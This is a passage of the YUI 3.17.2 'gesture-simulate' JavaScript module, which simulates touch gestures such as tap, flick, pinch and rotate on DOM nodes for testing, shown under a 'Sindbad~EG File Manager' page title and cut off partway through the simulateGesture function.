Sindbad~EG File Manager
/*
YUI 3.17.2 (build 9c3c78e)
Copyright 2014 Yahoo! Inc. All rights reserved.
Licensed under the BSD License.
http://yuilibrary.com/license/
*/
YUI.add('gesture-simulate', function (Y, NAME) {
/**
* Simulate high-level user gestures by generating a set of native DOM events.
*
* @module gesture-simulate
* @requires event-simulate, async-queue, node-screen
*/
var NAME = "gesture-simulate",
// phantomjs check may be temporary, until we determine if it really support touch all the way through, like it claims to (http://code.google.com/p/phantomjs/issues/detail?id=375)
SUPPORTS_TOUCH = ((Y.config.win && ("ontouchstart" in Y.config.win)) && !(Y.UA.phantomjs) && !(Y.UA.chrome && Y.UA.chrome < 6)),
gestureNames = {
tap: 1,
doubletap: 1,
press: 1,
move: 1,
flick: 1,
pinch: 1,
rotate: 1
},
touchEvents = {
touchstart: 1,
touchmove: 1,
touchend: 1,
touchcancel: 1
},
document = Y.config.doc,
emptyTouchList,
EVENT_INTERVAL = 20, // 20ms
START_PAGEX, // will be adjusted to the node element center
START_PAGEY, // will be adjusted to the node element center
// defaults that user can override.
DEFAULTS = {
// tap gestures
HOLD_TAP: 10, // 10ms
DELAY_TAP: 10, // 10ms
// press gesture
HOLD_PRESS: 3000, // 3sec
MIN_HOLD_PRESS: 1000, // 1sec
MAX_HOLD_PRESS: 60000, // 1min
// move gesture
DISTANCE_MOVE: 200, // 200 pixels
DURATION_MOVE: 1000, // 1sec
MAX_DURATION_MOVE: 5000,// 5sec
// flick gesture
MIN_VELOCITY_FLICK: 1.3,
DISTANCE_FLICK: 200, // 200 pixels
DURATION_FLICK: 1000, // 1sec
MAX_DURATION_FLICK: 5000,// 5sec
// pinch/rotation
DURATION_PINCH: 1000 // 1sec
},
TOUCH_START = 'touchstart',
TOUCH_MOVE = 'touchmove',
TOUCH_END = 'touchend',
GESTURE_START = 'gesturestart',
GESTURE_CHANGE = 'gesturechange',
GESTURE_END = 'gestureend',
MOUSE_UP = 'mouseup',
MOUSE_MOVE = 'mousemove',
MOUSE_DOWN = 'mousedown',
MOUSE_CLICK = 'click',
MOUSE_DBLCLICK = 'dblclick',
X_AXIS = 'x',
Y_AXIS = 'y';
function Simulations(node) {
if(!node) {
Y.error(NAME+': invalid target node');
}
this.node = node;
this.target = Y.Node.getDOMNode(node);
var startXY = this.node.getXY(),
dims = this._getDims();
START_PAGEX = startXY[0] + (dims[0])/2;
START_PAGEY = startXY[1] + (dims[1])/2;
}
Simulations.prototype = {
/**
* Helper method to convert a degree to a radian.
*
* @method _toRadian
* @private
* @param {Number} deg A degree to be converted to a radian.
* @return {Number} The degree in radian.
*/
_toRadian: function(deg) {
return deg * (Math.PI/180);
},
/**
* Helper method to get height/width while accounting for
* rotation/scale transforms where possible by using the
* bounding client rectangle height/width instead of the
* offsetWidth/Height which region uses.
* @method _getDims
* @private
* @return {Array} Array with [height, width]
*/
_getDims : function() {
var region,
width,
height;
// Ideally, this should be in DOM somewhere.
if (this.target.getBoundingClientRect) {
region = this.target.getBoundingClientRect();
if ("height" in region) {
height = region.height;
} else {
// IE7,8 has getBCR, but no height.
height = Math.abs(region.bottom - region.top);
}
if ("width" in region) {
width = region.width;
} else {
// IE7,8 has getBCR, but no width.
width = Math.abs(region.right - region.left);
}
} else {
region = this.node.get("region");
width = region.width;
height = region.height;
}
return [width, height];
},
/**
* Helper method to convert a point relative to the node element into
* the point in the page coordination.
*
* @method _calculateDefaultPoint
* @private
* @param {Array} point A point relative to the node element.
* @return {Array} The same point in the page coordination.
*/
_calculateDefaultPoint: function(point) {
var height;
if(!Y.Lang.isArray(point) || point.length === 0) {
point = [START_PAGEX, START_PAGEY];
} else {
if(point.length == 1) {
height = this._getDims[1];
point[1] = height/2;
}
// convert to page(viewport) coordination
point[0] = this.node.getX() + point[0];
point[1] = this.node.getY() + point[1];
}
return point;
},
/**
* The "rotate" and "pinch" methods are essencially same with the exact same
* arguments. Only difference is the required parameters. The rotate method
* requires "rotation" parameter while the pinch method requires "startRadius"
* and "endRadius" parameters.
*
* @method rotate
* @param {Function} cb The callback to execute when the gesture simulation
* is completed.
* @param {Array} center A center point where the pinch gesture of two fingers
* should happen. It is relative to the top left corner of the target
* node element.
* @param {Number} startRadius A radius of start circle where 2 fingers are
* on when the gesture starts. This is optional. The default is a fourth of
* either target node width or height whichever is smaller.
* @param {Number} endRadius A radius of end circle where 2 fingers will be on when
* the pinch or spread gestures are completed. This is optional.
* The default is a fourth of either target node width or height whichever is less.
* @param {Number} duration A duration of the gesture in millisecond.
* @param {Number} start A start angle(0 degree at 12 o'clock) where the
* gesture should start. Default is 0.
* @param {Number} rotation A rotation in degree. It is required.
*/
rotate: function(cb, center, startRadius, endRadius, duration, start, rotation) {
var radius,
r1 = startRadius, // optional
r2 = endRadius; // optional
if(!Y.Lang.isNumber(r1) || !Y.Lang.isNumber(r2) || r1<0 || r2<0) {
radius = (this.target.offsetWidth < this.target.offsetHeight)?
this.target.offsetWidth/4 : this.target.offsetHeight/4;
r1 = radius;
r2 = radius;
}
// required
if(!Y.Lang.isNumber(rotation)) {
Y.error(NAME+'Invalid rotation detected.');
}
this.pinch(cb, center, r1, r2, duration, start, rotation);
},
/**
* The "rotate" and "pinch" methods are essencially same with the exact same
* arguments. Only difference is the required parameters. The rotate method
* requires "rotation" parameter while the pinch method requires "startRadius"
* and "endRadius" parameters.
*
* The "pinch" gesture can simulate various 2 finger gestures such as pinch,
* spread and/or rotation. The "startRadius" and "endRadius" are required.
* If endRadius is larger than startRadius, it becomes a spread gesture
* otherwise a pinch gesture.
*
* @method pinch
* @param {Function} cb The callback to execute when the gesture simulation
* is completed.
* @param {Array} center A center point where the pinch gesture of two fingers
* should happen. It is relative to the top left corner of the target
* node element.
* @param {Number} startRadius A radius of start circle where 2 fingers are
* on when the gesture starts. This paramenter is required.
* @param {Number} endRadius A radius of end circle where 2 fingers will be on when
* the pinch or spread gestures are completed. This parameter is required.
* @param {Number} duration A duration of the gesture in millisecond.
* @param {Number} start A start angle(0 degree at 12 o'clock) where the
* gesture should start. Default is 0.
* @param {Number} rotation If rotation is desired during the pinch or
* spread gestures, this parameter can be used. Default is 0 degree.
*/
pinch: function(cb, center, startRadius, endRadius, duration, start, rotation) {
var eventQueue,
i,
interval = EVENT_INTERVAL,
touches,
id = 0,
r1 = startRadius, // required
r2 = endRadius, // required
radiusPerStep,
centerX, centerY,
startScale, endScale, scalePerStep,
startRot, endRot, rotPerStep,
path1 = {start: [], end: []}, // paths for 1st and 2nd fingers.
path2 = {start: [], end: []},
steps,
touchMove;
center = this._calculateDefaultPoint(center);
if(!Y.Lang.isNumber(r1) || !Y.Lang.isNumber(r2) || r1<0 || r2<0) {
Y.error(NAME+'Invalid startRadius and endRadius detected.');
}
if(!Y.Lang.isNumber(duration) || duration <= 0) {
duration = DEFAULTS.DURATION_PINCH;
}
if(!Y.Lang.isNumber(start)) {
start = 0.0;
} else {
start = start%360;
while(start < 0) {
start += 360;
}
}
if(!Y.Lang.isNumber(rotation)) {
rotation = 0.0;
}
Y.AsyncQueue.defaults.timeout = interval;
eventQueue = new Y.AsyncQueue();
// range determination
centerX = center[0];
centerY = center[1];
startRot = start;
endRot = start + rotation;
// 1st finger path
path1.start = [
centerX + r1*Math.sin(this._toRadian(startRot)),
centerY - r1*Math.cos(this._toRadian(startRot))
];
path1.end = [
centerX + r2*Math.sin(this._toRadian(endRot)),
centerY - r2*Math.cos(this._toRadian(endRot))
];
// 2nd finger path
path2.start = [
centerX - r1*Math.sin(this._toRadian(startRot)),
centerY + r1*Math.cos(this._toRadian(startRot))
];
path2.end = [
centerX - r2*Math.sin(this._toRadian(endRot)),
centerY + r2*Math.cos(this._toRadian(endRot))
];
startScale = 1.0;
endScale = endRadius/startRadius;
// touch/gesture start
eventQueue.add({
fn: function() {
var coord1, coord2, coord, touches;
// coordinate for each touch object.
coord1 = {
pageX: path1.start[0],
pageY: path1.start[1],
clientX: path1.start[0],
clientY: path1.start[1]
};
coord2 = {
pageX: path2.start[0],
pageY: path2.start[1],
clientX: path2.start[0],
clientY: path2.start[1]
};
touches = this._createTouchList([Y.merge({
identifier: (id++)
}, coord1), Y.merge({
identifier: (id++)
}, coord2)]);
// coordinate for top level event
coord = {
pageX: (path1.start[0] + path2.start[0])/2,
pageY: (path1.start[0] + path2.start[1])/2,
clientX: (path1.start[0] + path2.start[0])/2,
clientY: (path1.start[0] + path2.start[1])/2
};
this._simulateEvent(this.target, TOUCH_START, Y.merge({
touches: touches,
targetTouches: touches,
changedTouches: touches,
scale: startScale,
rotation: startRot
}, coord));
if(Y.UA.ios >= 2.0) {
/* gesture starts when the 2nd finger touch starts.
* The implementation will fire 1 touch start event for both fingers,
* simulating 2 fingers touched on the screen at the same time.
*/
this._simulateEvent(this.target, GESTURE_START, Y.merge({
scale: startScale,
rotation: startRot
}, coord));
}
},
timeout: 0,
context: this
});
// gesture change
steps = Math.floor(duration/interval);
radiusPerStep = (r2 - r1)/steps;
scalePerStep = (endScale - startScale)/steps;
rotPerStep = (endRot - startRot)/steps;
touchMove = function(step) {
var radius = r1 + (radiusPerStep)*step,
px1 = centerX + radius*Math.sin(this._toRadian(startRot + rotPerStep*step)),
py1 = centerY - radius*Math.cos(this._toRadian(startRot + rotPerStep*step)),
px2 = centerX - radius*Math.sin(this._toRadian(startRot + rotPerStep*step)),
py2 = centerY + radius*Math.cos(this._toRadian(startRot + rotPerStep*step)),
px = (px1+px2)/2,
py = (py1+py2)/2,
coord1, coord2, coord, touches;
// coordinate for each touch object.
coord1 = {
pageX: px1,
pageY: py1,
clientX: px1,
clientY: py1
};
coord2 = {
pageX: px2,
pageY: py2,
clientX: px2,
clientY: py2
};
touches = this._createTouchList([Y.merge({
identifier: (id++)
}, coord1), Y.merge({
identifier: (id++)
}, coord2)]);
// coordinate for top level event
coord = {
pageX: px,
pageY: py,
clientX: px,
clientY: py
};
this._simulateEvent(this.target, TOUCH_MOVE, Y.merge({
touches: touches,
targetTouches: touches,
changedTouches: touches,
scale: startScale + scalePerStep*step,
rotation: startRot + rotPerStep*step
}, coord));
if(Y.UA.ios >= 2.0) {
this._simulateEvent(this.target, GESTURE_CHANGE, Y.merge({
scale: startScale + scalePerStep*step,
rotation: startRot + rotPerStep*step
}, coord));
}
};
for (i=0; i < steps; i++) {
eventQueue.add({
fn: touchMove,
args: [i],
context: this
});
}
// gesture end
eventQueue.add({
fn: function() {
var emptyTouchList = this._getEmptyTouchList(),
coord1, coord2, coord, touches;
// coordinate for each touch object.
coord1 = {
pageX: path1.end[0],
pageY: path1.end[1],
clientX: path1.end[0],
clientY: path1.end[1]
};
coord2 = {
pageX: path2.end[0],
pageY: path2.end[1],
clientX: path2.end[0],
clientY: path2.end[1]
};
touches = this._createTouchList([Y.merge({
identifier: (id++)
}, coord1), Y.merge({
identifier: (id++)
}, coord2)]);
// coordinate for top level event
coord = {
pageX: (path1.end[0] + path2.end[0])/2,
pageY: (path1.end[0] + path2.end[1])/2,
clientX: (path1.end[0] + path2.end[0])/2,
clientY: (path1.end[0] + path2.end[1])/2
};
if(Y.UA.ios >= 2.0) {
this._simulateEvent(this.target, GESTURE_END, Y.merge({
scale: endScale,
rotation: endRot
}, coord));
}
this._simulateEvent(this.target, TOUCH_END, Y.merge({
touches: emptyTouchList,
targetTouches: emptyTouchList,
changedTouches: touches,
scale: endScale,
rotation: endRot
}, coord));
},
context: this
});
if(cb && Y.Lang.isFunction(cb)) {
eventQueue.add({
fn: cb,
// by default, the callback runs the node context where
// simulateGesture method is called.
context: this.node
//TODO: Use args to pass error object as 1st param if there is an error.
//args:
});
}
eventQueue.run();
},
/**
* The "tap" gesture can be used for various single touch point gestures
* such as single tap, N number of taps, long press. The default is a single
* tap.
*
* @method tap
* @param {Function} cb The callback to execute when the gesture simulation
* is completed.
* @param {Array} point A point(relative to the top left corner of the
* target node element) where the tap gesture should start. The default
* is the center of the taget node.
* @param {Number} times The number of taps. Default is 1.
* @param {Number} hold The hold time in milliseconds between "touchstart" and
* "touchend" event generation. Default is 10ms.
* @param {Number} delay The time gap in millisecond between taps if this
* gesture has more than 1 tap. Default is 10ms.
*/
tap: function(cb, point, times, hold, delay) {
var eventQueue = new Y.AsyncQueue(),
emptyTouchList = this._getEmptyTouchList(),
touches,
coord,
i,
touchStart,
touchEnd;
point = this._calculateDefaultPoint(point);
if(!Y.Lang.isNumber(times) || times < 1) {
times = 1;
}
if(!Y.Lang.isNumber(hold)) {
hold = DEFAULTS.HOLD_TAP;
}
if(!Y.Lang.isNumber(delay)) {
delay = DEFAULTS.DELAY_TAP;
}
coord = {
pageX: point[0],
pageY: point[1],
clientX: point[0],
clientY: point[1]
};
touches = this._createTouchList([Y.merge({identifier: 0}, coord)]);
touchStart = function() {
this._simulateEvent(this.target, TOUCH_START, Y.merge({
touches: touches,
targetTouches: touches,
changedTouches: touches
}, coord));
};
touchEnd = function() {
this._simulateEvent(this.target, TOUCH_END, Y.merge({
touches: emptyTouchList,
targetTouches: emptyTouchList,
changedTouches: touches
}, coord));
};
for (i=0; i < times; i++) {
eventQueue.add({
fn: touchStart,
context: this,
timeout: (i === 0)? 0 : delay
});
eventQueue.add({
fn: touchEnd,
context: this,
timeout: hold
});
}
if(times > 1 && !SUPPORTS_TOUCH) {
eventQueue.add({
fn: function() {
this._simulateEvent(this.target, MOUSE_DBLCLICK, coord);
},
context: this
});
}
if(cb && Y.Lang.isFunction(cb)) {
eventQueue.add({
fn: cb,
// by default, the callback runs the node context where
// simulateGesture method is called.
context: this.node
//TODO: Use args to pass error object as 1st param if there is an error.
//args:
});
}
eventQueue.run();
},
/**
* The "flick" gesture is a specialized "move" that has some velocity
* and the movement always runs either x or y axis. The velocity is calculated
* with "distance" and "duration" arguments. If the calculated velocity is
* below than the minimum velocity, the given duration will be ignored and
* new duration will be created to make a valid flick gesture.
*
* @method flick
* @param {Function} cb The callback to execute when the gesture simulation
* is completed.
* @param {Array} point A point(relative to the top left corner of the
* target node element) where the flick gesture should start. The default
* is the center of the taget node.
* @param {String} axis Either "x" or "y".
* @param {Number} distance A distance in pixels to flick.
* @param {Number} duration A duration of the gesture in millisecond.
*
*/
flick: function(cb, point, axis, distance, duration) {
var path;
point = this._calculateDefaultPoint(point);
if(!Y.Lang.isString(axis)) {
axis = X_AXIS;
} else {
axis = axis.toLowerCase();
if(axis !== X_AXIS && axis !== Y_AXIS) {
Y.error(NAME+'(flick): Only x or y axis allowed');
}
}
if(!Y.Lang.isNumber(distance)) {
distance = DEFAULTS.DISTANCE_FLICK;
}
if(!Y.Lang.isNumber(duration)){
duration = DEFAULTS.DURATION_FLICK; // ms
} else {
if(duration > DEFAULTS.MAX_DURATION_FLICK) {
duration = DEFAULTS.MAX_DURATION_FLICK;
}
}
/*
* Check if too slow for a flick.
* Adjust duration if the calculated velocity is less than
* the minimum velcocity to be claimed as a flick.
*/
if(Math.abs(distance)/duration < DEFAULTS.MIN_VELOCITY_FLICK) {
duration = Math.abs(distance)/DEFAULTS.MIN_VELOCITY_FLICK;
}
path = {
start: Y.clone(point),
end: [
(axis === X_AXIS) ? point[0]+distance : point[0],
(axis === Y_AXIS) ? point[1]+distance : point[1]
]
};
this._move(cb, path, duration);
},
/**
* The "move" gesture simulate the movement of any direction between
* the straight line of start and end point for the given duration.
* The path argument is an object with "point", "xdist" and "ydist" properties.
* The "point" property is an array with x and y coordinations(relative to the
* top left corner of the target node element) while "xdist" and "ydist"
* properties are used for the distance along the x and y axis. A negative
* distance number can be used to drag either left or up direction.
*
* If no arguments are given, it will simulate the default move, which
* is moving 200 pixels from the center of the element to the positive X-axis
* direction for 1 sec.
*
* @method move
* @param {Function} cb The callback to execute when the gesture simulation
* is completed.
* @param {Object} path An object with "point", "xdist" and "ydist".
* @param {Number} duration A duration of the gesture in millisecond.
*/
move: function(cb, path, duration) {
var convertedPath;
if(!Y.Lang.isObject(path)) {
path = {
point: this._calculateDefaultPoint([]),
xdist: DEFAULTS.DISTANCE_MOVE,
ydist: 0
};
} else {
// convert to the page coordination
if(!Y.Lang.isArray(path.point)) {
path.point = this._calculateDefaultPoint([]);
} else {
path.point = this._calculateDefaultPoint(path.point);
}
if(!Y.Lang.isNumber(path.xdist)) {
path.xdist = DEFAULTS.DISTANCE_MOVE;
}
if(!Y.Lang.isNumber(path.ydist)) {
path.ydist = 0;
}
}
if(!Y.Lang.isNumber(duration)){
duration = DEFAULTS.DURATION_MOVE; // ms
} else {
if(duration > DEFAULTS.MAX_DURATION_MOVE) {
duration = DEFAULTS.MAX_DURATION_MOVE;
}
}
convertedPath = {
start: Y.clone(path.point),
end: [path.point[0]+path.xdist, path.point[1]+path.ydist]
};
this._move(cb, convertedPath, duration);
},
/**
* A base method on top of "move" and "flick" methods. The method takes
* the path with start/end properties and duration to generate a set of
* touch events for the movement gesture.
*
* @method _move
* @private
* @param {Function} cb The callback to execute when the gesture simulation
* is completed.
* @param {Object} path An object with "start" and "end" properties. Each
* property should be an array with x and y coordination (e.g. start: [100, 50])
* @param {Number} duration A duration of the gesture in millisecond.
*/
_move: function(cb, path, duration) {
var eventQueue,
i,
interval = EVENT_INTERVAL,
steps, stepX, stepY,
id = 0,
touchMove;
if(!Y.Lang.isNumber(duration)){
duration = DEFAULTS.DURATION_MOVE; // ms
} else {
if(duration > DEFAULTS.MAX_DURATION_MOVE) {
duration = DEFAULTS.MAX_DURATION_MOVE;
}
}
if(!Y.Lang.isObject(path)) {
path = {
start: [
START_PAGEX,
START_PAGEY
],
end: [
START_PAGEX + DEFAULTS.DISTANCE_MOVE,
START_PAGEY
]
};
} else {
if(!Y.Lang.isArray(path.start)) {
path.start = [
START_PAGEX,
START_PAGEY
];
}
if(!Y.Lang.isArray(path.end)) {
path.end = [
START_PAGEX + DEFAULTS.DISTANCE_MOVE,
START_PAGEY
];
}
}
Y.AsyncQueue.defaults.timeout = interval;
eventQueue = new Y.AsyncQueue();
// start
eventQueue.add({
fn: function() {
var coord = {
pageX: path.start[0],
pageY: path.start[1],
clientX: path.start[0],
clientY: path.start[1]
},
touches = this._createTouchList([
Y.merge({identifier: (id++)}, coord)
]);
this._simulateEvent(this.target, TOUCH_START, Y.merge({
touches: touches,
targetTouches: touches,
changedTouches: touches
}, coord));
},
timeout: 0,
context: this
});
// move
steps = Math.floor(duration/interval);
stepX = (path.end[0] - path.start[0])/steps;
stepY = (path.end[1] - path.start[1])/steps;
touchMove = function(step) {
var px = path.start[0]+(stepX * step),
py = path.start[1]+(stepY * step),
coord = {
pageX: px,
pageY: py,
clientX: px,
clientY: py
},
touches = this._createTouchList([
Y.merge({identifier: (id++)}, coord)
]);
this._simulateEvent(this.target, TOUCH_MOVE, Y.merge({
touches: touches,
targetTouches: touches,
changedTouches: touches
}, coord));
};
for (i=0; i < steps; i++) {
eventQueue.add({
fn: touchMove,
args: [i],
context: this
});
}
// last move
eventQueue.add({
fn: function() {
var coord = {
pageX: path.end[0],
pageY: path.end[1],
clientX: path.end[0],
clientY: path.end[1]
},
touches = this._createTouchList([
Y.merge({identifier: id}, coord)
]);
this._simulateEvent(this.target, TOUCH_MOVE, Y.merge({
touches: touches,
targetTouches: touches,
changedTouches: touches
}, coord));
},
timeout: 0,
context: this
});
// end
eventQueue.add({
fn: function() {
var coord = {
pageX: path.end[0],
pageY: path.end[1],
clientX: path.end[0],
clientY: path.end[1]
},
emptyTouchList = this._getEmptyTouchList(),
touches = this._createTouchList([
Y.merge({identifier: id}, coord)
]);
this._simulateEvent(this.target, TOUCH_END, Y.merge({
touches: emptyTouchList,
targetTouches: emptyTouchList,
changedTouches: touches
}, coord));
},
context: this
});
if(cb && Y.Lang.isFunction(cb)) {
eventQueue.add({
fn: cb,
// by default, the callback runs the node context where
// simulateGesture method is called.
context: this.node
//TODO: Use args to pass error object as 1st param if there is an error.
//args:
});
}
eventQueue.run();
},
/**
* Helper method to return a singleton instance of empty touch list.
*
* @method _getEmptyTouchList
* @private
* @return {TouchList | Array} An empty touch list object.
*/
_getEmptyTouchList: function() {
if(!emptyTouchList) {
emptyTouchList = this._createTouchList([]);
}
return emptyTouchList;
},
/**
* Helper method to convert an array with touch points to TouchList object as
* defined in http://www.w3.org/TR/touch-events/
*
* @method _createTouchList
* @private
* @param {Array} touchPoints
* @return {TouchList | Array} If underlaying platform support creating touch list
* a TouchList object will be returned otherwise a fake Array object
* will be returned.
*/
_createTouchList: function(touchPoints) {
/*
* Android 4.0.3 emulator:
* Native touch api supported starting in version 4.0 (Ice Cream Sandwich).
* However the support seems limited. In Android 4.0.3 emulator, I got
* "TouchList is not defined".
*/
var touches = [],
touchList,
self = this;
if(!!touchPoints && Y.Lang.isArray(touchPoints)) {
if(Y.UA.android && Y.UA.android >= 4.0 || Y.UA.ios && Y.UA.ios >= 2.0) {
Y.each(touchPoints, function(point) {
if(!point.identifier) {point.identifier = 0;}
if(!point.pageX) {point.pageX = 0;}
if(!point.pageY) {point.pageY = 0;}
if(!point.screenX) {point.screenX = 0;}
if(!point.screenY) {point.screenY = 0;}
touches.push(document.createTouch(Y.config.win,
self.target,
point.identifier,
point.pageX, point.pageY,
point.screenX, point.screenY));
});
touchList = document.createTouchList.apply(document, touches);
} else if(Y.UA.ios && Y.UA.ios < 2.0) {
Y.error(NAME+': No touch event simulation framework present.');
} else {
// this will inclide android(Y.UA.android && Y.UA.android < 4.0)
// and desktops among all others.
/*
* Touch APIs are broken in androids older than 4.0. We will use
* simulated touch apis for these versions.
*/
touchList = [];
Y.each(touchPoints, function(point) {
if(!point.identifier) {point.identifier = 0;}
if(!point.clientX) {point.clientX = 0;}
if(!point.clientY) {point.clientY = 0;}
if(!point.pageX) {point.pageX = 0;}
if(!point.pageY) {point.pageY = 0;}
if(!point.screenX) {point.screenX = 0;}
if(!point.screenY) {point.screenY = 0;}
touchList.push({
target: self.target,
identifier: point.identifier,
clientX: point.clientX,
clientY: point.clientY,
pageX: point.pageX,
pageY: point.pageY,
screenX: point.screenX,
screenY: point.screenY
});
});
touchList.item = function(i) {
return touchList[i];
};
}
} else {
Y.error(NAME+': Invalid touchPoints passed');
}
return touchList;
},
/**
* @method _simulateEvent
* @private
* @param {HTMLElement} target The DOM element that's the target of the event.
* @param {String} type The type of event or name of the supported gesture to simulate
* (i.e., "click", "doubletap", "flick").
* @param {Object} options (Optional) Extra options to copy onto the event object.
* For gestures, options are used to refine the gesture behavior.
*/
_simulateEvent: function(target, type, options) {
var touches;
if (touchEvents[type]) {
if(SUPPORTS_TOUCH) {
Y.Event.simulate(target, type, options);
} else {
// simulate using mouse events if touch is not applicable on this platform.
// but only single touch event can be simulated.
if(this._isSingleTouch(options.touches, options.targetTouches, options.changedTouches)) {
type = {
touchstart: MOUSE_DOWN,
touchmove: MOUSE_MOVE,
touchend: MOUSE_UP
}[type];
options.button = 0;
options.relatedTarget = null; // since we are not using mouseover event.
// touchend has none in options.touches.
touches = (type === MOUSE_UP)? options.changedTouches : options.touches;
options = Y.mix(options, {
screenX: touches.item(0).screenX,
screenY: touches.item(0).screenY,
clientX: touches.item(0).clientX,
clientY: touches.item(0).clientY
}, true);
Y.Event.simulate(target, type, options);
if(type == MOUSE_UP) {
Y.Event.simulate(target, MOUSE_CLICK, options);
}
} else {
Y.error("_simulateEvent(): Event '" + type + "' has multi touch objects that can't be simulated in your platform.");
}
}
} else {
// pass thru for all non touch events
Y.Event.simulate(target, type, options);
}
},
/**
* Helper method to check the single touch.
* @method _isSingleTouch
* @private
* @param {TouchList} touches
* @param {TouchList} targetTouches
* @param {TouchList} changedTouches
*/
_isSingleTouch: function(touches, targetTouches, changedTouches) {
return (touches && (touches.length <= 1)) &&
(targetTouches && (targetTouches.length <= 1)) &&
(changedTouches && (changedTouches.length <= 1));
}
};
/*
* A gesture simulation class.
*/
Y.GestureSimulation = Simulations;
/*
* Various simulation default behavior properties. If user override
* Y.GestureSimulation.defaults, overriden values will be used and this
* should be done before the gesture simulation.
*/
Y.GestureSimulation.defaults = DEFAULTS;
/*
* The high level gesture names that YUI knows how to simulate.
*/
Y.GestureSimulation.GESTURES = gestureNames;
/**
* Simulates the higher user level gesture of the given name on a target.
* This method generates a set of low level touch events(Apple specific gesture
* events as well for the iOS platforms) asynchronously. Note that gesture
* simulation is relying on `Y.Event.simulate()` method to generate
* the touch events under the hood. The `Y.Event.simulate()` method
* itself is a synchronous method.
*
* Users are suggested to use `Node.simulateGesture()` method which
* basically calls this method internally. Supported gestures are `tap`,
* `doubletap`, `press`, `move`, `flick`, `pinch` and `rotate`.
*
* The `pinch` gesture is used to simulate the pinching and spreading of two
* fingers. During a pinch simulation, rotation is also possible. Essentially
* `pinch` and `rotate` simulations share the same base implementation to allow
* both pinching and rotation at the same time. The only difference is `pinch`
* requires `start` and `end` option properties while `rotate` requires `rotation`
* option property.
*
* The `pinch` and `rotate` gestures can be described as placing 2 fingers along a
* circle. Pinching and spreading can be described by start and end circles while
* rotation occurs on a single circle. If the radius of the start circle is greater
* than the end circle, the gesture becomes a pinch, otherwise it is a spread spread.
*
* @example
*
* var node = Y.one("#target");
*
* // double tap example
* node.simulateGesture("doubletap", function() {
* // my callback function
* });
*
* // flick example from the center of the node, move 50 pixels down for 50ms)
* node.simulateGesture("flick", {
* axis: y,
* distance: -100
* duration: 50
* }, function() {
* // my callback function
* });
*
* // simulate rotating a node 75 degrees counter-clockwise
* node.simulateGesture("rotate", {
* rotation: -75
* });
*
* // simulate a pinch and a rotation at the same time.
* // fingers start on a circle of radius 100 px, placed at top/bottom
* // fingers end on a circle of radius 50px, placed at right/left
* node.simulateGesture("pinch", {
* r1: 100,
* r2: 50,
* start: 0
* rotation: 90
* });
*
* @method simulateGesture
* @param {HTMLElement|Node} node The YUI node or HTML element that's the target
* of the event.
* @param {String} name The name of the supported gesture to simulate. The
* supported gesture name is one of "tap", "doubletap", "press", "move",
* "flick", "pinch" and "rotate".
* @param {Object} [options] Extra options used to define the gesture behavior:
*
* Valid options properties for the `tap` gesture:
*
* @param {Array} [options.point] (Optional) Indicates the [x,y] coordinates
* where the tap should be simulated. Default is the center of the node
* element.
* @param {Number} [options.hold=10] (Optional) The hold time in milliseconds.
* This is the time between `touchstart` and `touchend` event generation.
* @param {Number} [options.times=1] (Optional) Indicates the number of taps.
* @param {Number} [options.delay=10] (Optional) The number of milliseconds
* before the next tap simulation happens. This is valid only when `times`
* is more than 1.
*
* Valid options properties for the `doubletap` gesture:
*
* @param {Array} [options.point] (Optional) Indicates the [x,y] coordinates
* where the doubletap should be simulated. Default is the center of the
* node element.
*
* Valid options properties for the `press` gesture:
*
* @param {Array} [options.point] (Optional) Indicates the [x,y] coordinates
* where the press should be simulated. Default is the center of the node
* element.
* @param {Number} [options.hold=3000] (Optional) The hold time in milliseconds.
* This is the time between `touchstart` and `touchend` event generation.
* Default is 3000ms (3 seconds).
*
* Valid options properties for the `move` gesture:
*
* @param {Object} [options.path] (Optional) Indicates the path of the finger
* movement. It's an object with three optional properties: `point`,
* `xdist` and `ydist`.
* @param {Array} [options.path.point] A starting point of the gesture.
* Default is the center of the node element.
* @param {Number} [options.path.xdist=200] A distance to move in pixels
* along the X axis. A negative distance value indicates moving left.
* @param {Number} [options.path.ydist=0] A distance to move in pixels
* along the Y axis. A negative distance value indicates moving up.
* @param {Number} [options.duration=1000] (Optional) The duration of the
* gesture in milliseconds.
*
* Valid options properties for the `flick` gesture:
*
* @param {Array} [options.point] (Optional) Indicates the [x, y] coordinates
* where the flick should be simulated. Default is the center of the
* node element.
* @param {String} [options.axis='x'] (Optional) Valid values are either
* "x" or "y". Indicates axis to move along. The flick can move to one of
* 4 directions(left, right, up and down).
* @param {Number} [options.distance=200] (Optional) Distance to move in pixels
* @param {Number} [options.duration=1000] (Optional) The duration of the
* gesture in milliseconds. User given value could be automatically
* adjusted by the framework if it is below the minimum velocity to be
* a flick gesture.
*
* Valid options properties for the `pinch` gesture:
*
* @param {Array} [options.center] (Optional) The center of the circle where
* two fingers are placed. Default is the center of the node element.
* @param {Number} [options.r1] (Required) Pixel radius of the start circle
* where 2 fingers will be on when the gesture starts. The circles are
* centered at the center of the element.
* @param {Number} [options.r2] (Required) Pixel radius of the end circle
* when this gesture ends.
* @param {Number} [options.duration=1000] (Optional) The duration of the
* gesture in milliseconds.
* @param {Number} [options.start=0] (Optional) Starting degree of the first
* finger. The value is relative to the path of the north. Default is 0
* (i.e., 12:00 on a clock).
* @param {Number} [options.rotation=0] (Optional) Degrees to rotate from
* the starting degree. A negative value means rotation to the
* counter-clockwise direction.
*
* Valid options properties for the `rotate` gesture:
*
* @param {Array} [options.center] (Optional) The center of the circle where
* two fingers are placed. Default is the center of the node element.
* @param {Number} [options.r1] (Optional) Pixel radius of the start circle
* where 2 fingers will be on when the gesture starts. The circles are
* centered at the center of the element. Default is a fourth of the node
* element width or height, whichever is smaller.
* @param {Number} [options.r2] (Optional) Pixel radius of the end circle
* when this gesture ends. Default is a fourth of the node element width or
* height, whichever is smaller.
* @param {Number} [options.duration=1000] (Optional) The duration of the
* gesture in milliseconds.
* @param {Number} [options.start=0] (Optional) Starting degree of the first
* finger. The value is relative to the path of the north. Default is 0
* (i.e., 12:00 on a clock).
* @param {Number} [options.rotation] (Required) Degrees to rotate from
* the starting degree. A negative value means rotation to the
* counter-clockwise direction.
*
* @param {Function} [cb] The callback to execute when the asynchronouse gesture
* simulation is completed.
* @param {Error} cb.err An error object if the simulation is failed.
* @for Event
* @static
*/
Y.Event.simulateGesture = function(node, name, options, cb) {
node = Y.one(node);
var sim = new Y.GestureSimulation(node);
name = name.toLowerCase();
if(!cb && Y.Lang.isFunction(options)) {
cb = options;
options = {};
}
options = options || {};
if (gestureNames[name]) {
switch(name) {
// single-touch: point gestures
case 'tap':
